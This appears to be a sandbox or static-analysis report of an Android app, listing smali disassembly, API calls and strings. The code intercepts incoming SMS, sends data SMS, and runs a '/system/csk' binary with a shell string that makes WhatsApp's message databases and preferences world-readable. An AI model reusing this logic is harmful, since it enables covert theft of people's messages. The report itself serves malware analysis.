    109aput-object v8, v5, v4
    110aget-object v8, v5, v4
    112invoke-virtual {v8}, Landroid/telephony/SmsMessage;->getOriginatingAddress()Ljava/lang/String;
    113move-result-object v1
    114new-instance v8, Ljava/lang/StringBuilder;
    116invoke-static {v7}, Ljava/lang/String;->valueOf(Ljava/lang/Object;)Ljava/lang/String;
    117move-result-object v9
    119invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    120new-instance v9, Ljava/lang/String;
    121aget-object v10, v5, v4
    123invoke-virtual {v10}, Landroid/telephony/SmsMessage;->getUserData()[B
    124move-result-object v10
    126const-string v11, "utf8"
    128invoke-direct {v9, v10, v11}, Ljava/lang/String;-><init>([BLjava/lang/String;)V
    130invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    131move-result-object v8
    133invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    134try_end_b6: move-result-object v7
    135add-int/lit8 v4, v4, 0x1
    136goto/16 :goto_44
    137catch_ba: move-exception v3
    138new-instance v8, Ljava/lang/StringBuilder;
    140const-string v9, "onReceive Exception- "
    142invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    144invoke-virtual {v3}, Ljava/lang/Throwable;->getMessage()Ljava/lang/String;
    145move-result-object v9
    147invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    148move-result-object v8
    150invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    151move-result-object v8
    153invoke-static {v8, v3}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    154goto/16 :goto_88
    Cross References
    APIs
    • android.telephony.SmsManager.getDefault
    • com.binary.sms.receiver.SkeletonActivity.phoneNumber:Landroid/widget/EditText
    • android.widget.EditText.getText
    • android.text.Editable.toString
    • java.lang.String.length
    • com.binary.sms.receiver.SkeletonActivity.smsBody:Landroid/widget/EditText
    • android.widget.EditText.getText
    • android.text.Editable.toString
    • java.lang.String.getBytes
    • android.telephony.SmsManager.sendDataMessage
    • com.binary.sms.receiver.SkeletonActivity.getApplicationContext
    • android.widget.Toast.makeText
    • android.widget.Toast.show
    • com.binary.sms.receiver.SkeletonActivity.getApplicationContext
    • android.widget.Toast.makeText
    • android.widget.Toast.show
    • com.binary.sms.receiver.SkeletonActivity.getApplicationContext
    • android.widget.Toast.makeText
    • android.widget.Toast.show
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • Your sms has successfully sent!
    • Please enter a valid phone number
    • Your sms has failed...
    • sendSmsByManager exception:
    Position Instruction Meta Information
    0.prologue
    1const/4 v9, 0x1
    2try_start_1:
    3invoke-static {}, Landroid/telephony/SmsManager;->getDefault()Landroid/telephony/SmsManager;
    4move-result-object v0
    6iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity;->phoneNumber:Landroid/widget/EditText;
    8invoke-virtual {v2}, Landroid/widget/EditText;->getText()Landroid/text/Editable;
    9move-result-object v2
    11invoke-interface {v2}, Landroid/text/Editable;->toString()Ljava/lang/String;
    12move-result-object v1
    13if-eqz v1, :cond_3c
    15invoke-virtual {v1}, Ljava/lang/String;->length()I
    16move-result v2
    17if-lez v2, :cond_3c
    19iget-object v2, p0, Lcom/binary/sms/receiver/SkeletonActivity;->smsBody:Landroid/widget/EditText;
    21invoke-virtual {v2}, Landroid/widget/EditText;->getText()Landroid/text/Editable;
    22move-result-object v2
    24invoke-interface {v2}, Landroid/text/Editable;->toString()Ljava/lang/String;
    25move-result-object v7
    27const-string v2, ""
    28const/4 v3, 0x0
    30invoke-virtual {v7}, Ljava/lang/String;->getBytes()[B
    31move-result-object v4
    32const/4 v5, 0x0
    33const/4 v6, 0x0
    35invoke-virtual/range {v0 .. v6}, Landroid/telephony/SmsManager;->sendDataMessage(Ljava/lang/String;Ljava/lang/String;S[BLandroid/app/PendingIntent;Landroid/app/PendingIntent;)V
    37invoke-virtual {p0}, Lcom/binary/sms/receiver/SkeletonActivity;->getApplicationContext()Landroid/content/Context;
    38move-result-object v2
    40const-string v3, "Your sms has successfully sent!"
    41const/4 v4, 0x1
    43invoke-static {v2, v3, v4}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
    44move-result-object v2
    46invoke-virtual {v2}, Landroid/widget/Toast;->show()V
    47goto_3b: return-void
    48cond_3c:
    49invoke-virtual {p0}, Lcom/binary/sms/receiver/SkeletonActivity;->getApplicationContext()Landroid/content/Context;
    50move-result-object v2
    52const-string v3, "Please enter a valid phone number"
    53const/4 v4, 0x1
    55invoke-static {v2, v3, v4}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
    56move-result-object v2
    58invoke-virtual {v2}, Landroid/widget/Toast;->show()V
    59try_end_4a: goto/16 :goto_3b
    60catch_4b: move-exception v8
    62invoke-virtual {p0}, Lcom/binary/sms/receiver/SkeletonActivity;->getApplicationContext()Landroid/content/Context;
    63move-result-object v2
    65const-string v3, "Your sms has failed..."
    67invoke-static {v2, v3, v9}, Landroid/widget/Toast;->makeText(Landroid/content/Context;Ljava/lang/CharSequence;I)Landroid/widget/Toast;
    68move-result-object v2
    70invoke-virtual {v2}, Landroid/widget/Toast;->show()V
    71new-instance v2, Ljava/lang/StringBuilder;
    73const-string v3, "sendSmsByManager exception:"
    75invoke-direct {v2, v3}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    77invoke-virtual {v8}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    78move-result-object v3
    80invoke-virtual {v2, v3}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    81move-result-object v2
    83invoke-virtual {v2}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    84move-result-object v2
    86invoke-static {v2, v8}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    87goto/16 :goto_3b
    APIs
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Runtime.getRuntime
    • java.lang.Runtime.exec
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • file not exist:
    • /system/csk
    • export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 7777 /data/data/com.whatsapp/; chmod 7777 /data/data/com.whatsapp/databases/; chmod 777 /data/data/com.whatsapp/databases/msgstore.db; chmod 7777 /data/data/com.whatsapp/databases/wa.db ;chmod 7777 /data/data/com.whatsapp/shared_prefs/com.whatsapp_preferences.xml;
    • chmodFilesArry ext
    Position Instruction Meta Information
    0.param p1, "f" # Ljava/io/File;
    1.param p2, "dest" # Ljava/lang/String;
    2.prologue
    3try_start_0: new-instance v1, Ljava/lang/StringBuilder;
    5const-string v2, "file not exist: "
    7invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    9invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    10move-result-object v2
    12invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    13move-result-object v1
    15invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    16move-result-object v1
    18invoke-static {v1}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    20invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    21move-result-object v1
    22const/4 v2, 0x2
    23new-array v2, v2, [Ljava/lang/String;
    24const/4 v3, 0x0
    26const-string v4, "/system/csk"
    27aput-object v4, v2, v3
    28const/4 v3, 0x1
    30const-string v4, "export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 7777 /data/data/com.whatsapp/; chmod 7777 /data/data/com.whatsapp/databases/; chmod 777 /data/data/com.whatsapp/databases/msgstore.db; chmod 7777 /data/data/com.whatsapp/databases/wa.db ;chmod 7777 /data/data/com.whatsapp/shared_prefs/com.whatsapp_preferences.xml;"
    31aput-object v4, v2, v3
    33invoke-virtual {v1, v2}, Ljava/lang/Runtime;->exec([Ljava/lang/String;)Ljava/lang/Process;
    34goto_2a: return-void
    35catch_2b: move-exception v0
    36new-instance v1, Ljava/lang/StringBuilder;
    38const-string v2, "chmodFilesArry ext"
    40invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    42invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    43move-result-object v2
    45invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    46move-result-object v1
    48invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    49move-result-object v1
    51invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    52goto/16 :goto_2a
    Cross References
    APIs
    • java.lang.Runtime.getRuntime
    • java.lang.Runtime.exec
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • /system/csk
    • export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 777 /data/data/com.whatsapp/databases/
    • chmodFilesArry ext
    Position Instruction Meta Information
    0.param p1, "f" # Ljava/io/File;
    1.param p2, "dest" # Ljava/lang/String;
    2.prologue
    3try_start_0:
    4invoke-static {}, Ljava/lang/Runtime;->getRuntime()Ljava/lang/Runtime;
    5move-result-object v1
    6const/4 v2, 0x2
    7new-array v2, v2, [Ljava/lang/String;
    8const/4 v3, 0x0
    10const-string v4, "/system/csk"
    11aput-object v4, v2, v3
    12const/4 v3, 0x1
    14const-string v4, "export LD_LIBRARY_PATH=/vendor/lib:/system/lib; chmod 777 /data/data/com.whatsapp/databases/"
    15aput-object v4, v2, v3
    17invoke-virtual {v1, v2}, Ljava/lang/Runtime;->exec([Ljava/lang/String;)Ljava/lang/Process;
    18try_end_14: return-void
    19catch_15: move-exception v0
    20new-instance v1, Ljava/lang/StringBuilder;
    22const-string v2, "chmodFilesArry ext"
    24invoke-direct {v1, v2}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    26invoke-virtual {v0}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    27move-result-object v2
    29invoke-virtual {v1, v2}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    30move-result-object v1
    32invoke-virtual {v1}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    33move-result-object v1
    35invoke-static {v1, v0}, Lcom/binary/sms/receiver/Logger;->error(Ljava/lang/String;Ljava/lang/Throwable;)V
    36goto/16 :goto_14
    Cross References
    APIs
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.FileInputStream.<init>
    • java.io.FileOutputStream.<init>
    • java.io.FileInputStream.read
    • java.io.FileInputStream.close
    • java.io.FileOutputStream.close
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.FileOutputStream.write
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.io.IOException.initCause
    • java.io.IOException.getStackTrace
    • java.io.IOException.setStackTrace
    • java.io.FileInputStream.close
    • java.io.FileOutputStream.close
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • copy file src:
    • copy file des:
    • end copy file src:
    • end copy file des:
    • copyFiles: Unable to copy file:
    • to
    • .
    Position Instruction Meta Information
    0.param p0, "src" # Ljava/io/File;
    1.param p1, "dest" # Ljava/io/File;
    2.annotation system Ldalvik/annotation/Throws;
    3value = {
    4Ljava/io/IOException;
    5}
    6.end annotation
    7.prologue
    8new-instance v8, Ljava/lang/StringBuilder;
    10const-string v9, "copy file src: "
    12invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    14invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    15move-result-object v9
    17invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    18move-result-object v8
    20invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    21move-result-object v8
    23invoke-static {v8}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    24new-instance v8, Ljava/lang/StringBuilder;
    26const-string v9, "copy file des: "
    28invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    30invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    31move-result-object v9
    33invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    34move-result-object v8
    36invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    37move-result-object v8
    39invoke-static {v8}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    40const/4 v3, 0x0
    41const/4 v5, 0x0
    42const/16 v8, 0x1000
    43new-array v0, v8, [B
    44try_start_32: new-instance v4, Ljava/io/FileInputStream;
    46invoke-direct {v4, p0}, Ljava/io/FileInputStream;-><init>(Ljava/io/File;)V
    47try_end_37: new-instance v6, Ljava/io/FileOutputStream;
    49invoke-direct {v6, p1}, Ljava/io/FileOutputStream;-><init>(Ljava/io/File;)V
    50try_start_3c:
    51invoke-virtual {v4, v0}, Ljava/io/FileInputStream;->read([B)I
    52try_end_3f: move-result v1
    53if-gez v1, :cond_79
    54if-eqz v4, :cond_47
    56invoke-virtual {v4}, Ljava/io/FileInputStream;->close()V
    57cond_47: if-eqz v6, :cond_4c
    59invoke-virtual {v6}, Ljava/io/FileOutputStream;->close()V
    60cond_4c: new-instance v8, Ljava/lang/StringBuilder;
    62const-string v9, "end copy file src: "
    64invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    66invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    67move-result-object v9
    69invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    70move-result-object v8
    72invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    73move-result-object v8
    75invoke-static {v8}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    76new-instance v8, Ljava/lang/StringBuilder;
    78const-string v9, "end copy file des: "
    80invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    82invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    83move-result-object v9
    85invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    86move-result-object v8
    88invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    89move-result-object v8
    91invoke-static {v8}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    92return-void
    93cond_79: const/4 v8, 0x0
    94try_start_7a:
    95invoke-virtual {v6, v0, v8, v1}, Ljava/io/FileOutputStream;->write([BII)V
    96try_end_7d: goto/16 :goto_3c
    97catch_7e: move-exception v2
    98move-object v5, v6
    99move-object v3, v4
    100goto_81: new-instance v7, Ljava/io/IOException;
    101new-instance v8, Ljava/lang/StringBuilder;
    103const-string v9, "copyFiles: Unable to copy file: "
    105invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    107invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    108move-result-object v9
    110invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    111move-result-object v8
    113const-string v9, "to"
    115invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    116move-result-object v8
    118invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    119move-result-object v9
    121invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    122move-result-object v8
    124const-string v9, "."
    126invoke-virtual {v8, v9}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    127move-result-object v8
    129invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    130move-result-object v8
    132invoke-direct {v7, v8}, Ljava/io/IOException;-><init>(Ljava/lang/String;)V
    134invoke-virtual {v7, v2}, Ljava/io/IOException;->initCause(Ljava/lang/Throwable;)Ljava/lang/Throwable;
    136invoke-virtual {v2}, Ljava/io/IOException;->getStackTrace()[Ljava/lang/StackTraceElement;
    137move-result-object v8
    139invoke-virtual {v7, v8}, Ljava/io/IOException;->setStackTrace([Ljava/lang/StackTraceElement;)V
    140throw v7
    141catchall_b8: move-exception v8
    142goto_b9: if-eqz v3, :cond_be
    144invoke-virtual {v3}, Ljava/io/FileInputStream;->close()V
    145cond_be: if-eqz v5, :cond_c3
    147invoke-virtual {v5}, Ljava/io/FileOutputStream;->close()V
    148cond_c3: new-instance v9, Ljava/lang/StringBuilder;
    150const-string v10, "end copy file src: "
    152invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    154invoke-virtual {p0}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    155move-result-object v10
    157invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    158move-result-object v9
    160invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    161move-result-object v9
    163invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    164new-instance v9, Ljava/lang/StringBuilder;
    166const-string v10, "end copy file des: "
    168invoke-direct {v9, v10}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    170invoke-virtual {p1}, Ljava/io/File;->getAbsolutePath()Ljava/lang/String;
    171move-result-object v10
    173invoke-virtual {v9, v10}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    174move-result-object v9
    176invoke-virtual {v9}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    177move-result-object v9
    179invoke-static {v9}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    180throw v8
    181catchall_f0: move-exception v8
    182move-object v3, v4
    183goto/16 :goto_b9
    184catchall_f3: move-exception v8
    185move-object v5, v6
    186move-object v3, v4
    187goto/16 :goto_b9
    188catch_f7: move-exception v2
    189goto/16 :goto_81
    190catch_f9: move-exception v2
    191move-object v3, v4
    192goto/16 :goto_81
    Cross References
    APIs
    • java.lang.Process.destroy
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.util.concurrent.TimeoutException.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.getInputStream
    • java.io.InputStream.available
    • java.lang.Process.getInputStream
    • java.io.InputStream.read
    • java.lang.StringBuilder.<init>
    • java.lang.String.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.getErrorStream
    • java.io.InputStream.available
    • java.lang.Process.getErrorStream
    • java.io.InputStream.read
    • java.lang.StringBuilder.<init>
    • java.lang.String.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Process.exitValue
    • java.lang.StringBuilder.<init>
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.Thread.sleep
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    Strings
    • runProcess WaitForTimeout Destroy process. after=
    • runProcess WaitForTimeout spend=
    • bytes=
    • runProcess WaitForTimeout getInputStream=
    • runProcess WaitForTimeout getErrorStream=
    • runProcess WaitForTimeout jump=
    • , spend=
    • , bytes=
    • runProcess WaitForTimeout exception=
    Position Instruction Meta Information
    0.param p0, "process" # Ljava/lang/Process;
    1.param p1, "timeout" # I
    2.annotation system Ldalvik/annotation/Throws;
    3value = {
    4Ljava/lang/InterruptedException;,
    5Ljava/util/concurrent/TimeoutException;
    6}
    7.end annotation
    8.prologue
    9const/4 v5, 0x0
    10const/4 v6, 0x0
    11const/16 v3, 0x64
    12const/4 v1, 0x0
    13goto_5: if-lt v6, p1, :cond_31
    15invoke-virtual {p0}, Ljava/lang/Process;->destroy()V
    16new-instance v7, Ljava/lang/StringBuilder;
    18const-string v8, "runProcess WaitForTimeout Destroy process. after="
    20invoke-direct {v7, v8}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    22invoke-virtual {v7, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    23move-result-object v7
    25invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    26move-result-object v7
    28invoke-static {v7}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    29new-instance v7, Ljava/util/concurrent/TimeoutException;
    30new-instance v8, Ljava/lang/StringBuilder;
    32const-string v9, "runProcess WaitForTimeout Destroy process. after="
    34invoke-direct {v8, v9}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    36invoke-virtual {v8, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    37move-result-object v8
    39invoke-virtual {v8}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    40move-result-object v8
    42invoke-direct {v7, v8}, Ljava/util/concurrent/TimeoutException;-><init>(Ljava/lang/String;)V
    43throw v7
    44cond_31: new-instance v7, Ljava/lang/StringBuilder;
    46const-string v8, "runProcess WaitForTimeout spend="
    48invoke-direct {v7, v8}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    50invoke-virtual {v7, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    51move-result-object v7
    53const-string v8, " bytes="
    55invoke-virtual {v7, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    56move-result-object v7
    58invoke-virtual {v7, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    59move-result-object v7
    61invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    62move-result-object v7
    64invoke-static {v7}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    66invoke-virtual {p0}, Ljava/lang/Process;->getInputStream()Ljava/io/InputStream;
    67move-result-object v7
    69invoke-virtual {v7}, Ljava/io/InputStream;->available()I
    70move-result v2
    71if-lez v2, :cond_78
    72new-array v0, v2, [B
    74invoke-virtual {p0}, Ljava/lang/Process;->getInputStream()Ljava/io/InputStream;
    75move-result-object v7
    77invoke-virtual {v7, v0}, Ljava/io/InputStream;->read([B)I
    78add-int/2addr v1, v2
    79new-instance v7, Ljava/lang/StringBuilder;
    81const-string v8, "runProcess WaitForTimeout getInputStream="
    83invoke-direct {v7, v8}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    84new-instance v8, Ljava/lang/String;
    86invoke-direct {v8, v0}, Ljava/lang/String;-><init>([B)V
    88invoke-virtual {v7, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    89move-result-object v7
    91invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    92move-result-object v7
    94invoke-static {v7}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    95cond_78:
    96invoke-virtual {p0}, Ljava/lang/Process;->getErrorStream()Ljava/io/InputStream;
    97move-result-object v7
    99invoke-virtual {v7}, Ljava/io/InputStream;->available()I
    100move-result v2
    101if-lez v2, :cond_a3
    102new-array v0, v2, [B
    104invoke-virtual {p0}, Ljava/lang/Process;->getErrorStream()Ljava/io/InputStream;
    105move-result-object v7
    107invoke-virtual {v7, v0}, Ljava/io/InputStream;->read([B)I
    108add-int/2addr v1, v2
    109new-instance v7, Ljava/lang/StringBuilder;
    111const-string v8, "runProcess WaitForTimeout getErrorStream="
    113invoke-direct {v7, v8}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    114new-instance v8, Ljava/lang/String;
    116invoke-direct {v8, v0}, Ljava/lang/String;-><init>([B)V
    118invoke-virtual {v7, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    119move-result-object v7
    121invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    122move-result-object v7
    124invoke-static {v7}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    125cond_a3:
    126invoke-virtual {p0}, Ljava/lang/Process;->exitValue()I
    127try_end_a6: move-result v5
    128return v5
    129catch_a8: move-exception v4
    130new-instance v7, Ljava/lang/StringBuilder;
    132const-string v8, "runProcess WaitForTimeout jump="
    134invoke-direct {v7, v8}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    136invoke-virtual {v7, v3}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    137move-result-object v7
    139const-string v8, ", spend="
    141invoke-virtual {v7, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    142move-result-object v7
    144invoke-virtual {v7, v6}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    145move-result-object v7
    147const-string v8, ", bytes="
    149invoke-virtual {v7, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    150move-result-object v7
    152invoke-virtual {v7, v1}, Ljava/lang/StringBuilder;->append(I)Ljava/lang/StringBuilder;
    153move-result-object v7
    155invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    156move-result-object v7
    158invoke-static {v7}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    159goto_cf: int-to-long v7, v3
    161invoke-static {v7, v8}, Ljava/lang/Thread;->sleep(J)V
    162add-int/lit8 v6, v6, 0x64
    163const/16 v7, 0x3e8
    164if-ne v3, v7, :cond_5
    165const/16 v3, 0x64
    166goto/16 :goto_5
    167catch_dd: move-exception v4
    168new-instance v7, Ljava/lang/StringBuilder;
    170const-string v8, "runProcess WaitForTimeout exception="
    172invoke-direct {v7, v8}, Ljava/lang/StringBuilder;-><init>(Ljava/lang/String;)V
    174invoke-virtual {v4}, Ljava/lang/Exception;->getMessage()Ljava/lang/String;
    175move-result-object v8
    177invoke-virtual {v7, v8}, Ljava/lang/StringBuilder;->append(Ljava/lang/String;)Ljava/lang/StringBuilder;
    178move-result-object v7
    180invoke-virtual {v7}, Ljava/lang/StringBuilder;->toString()Ljava/lang/String;
    181move-result-object v7
    183invoke-static {v7}, Lcom/binary/sms/receiver/Logger;->info(Ljava/lang/String;)V
    184goto/16 :goto_cf
    Cross References
    APIs
    • java.io.File.exists
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.lang.StringBuilder.<init>
    • java.lang.Exception.getMessage
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.File.canRead
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.io.File.isDirectory
    • java.io.File.exists
    • java.io.File.mkdirs
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.io.IOException.<init>
    • java.lang.StringBuilder.<init>
    • java.io.File.getAbsolutePath
    • java.lang.StringBuilder.append
    • java.lang.StringBuilder.toString
    • java.lang.StringBuilder.<init>
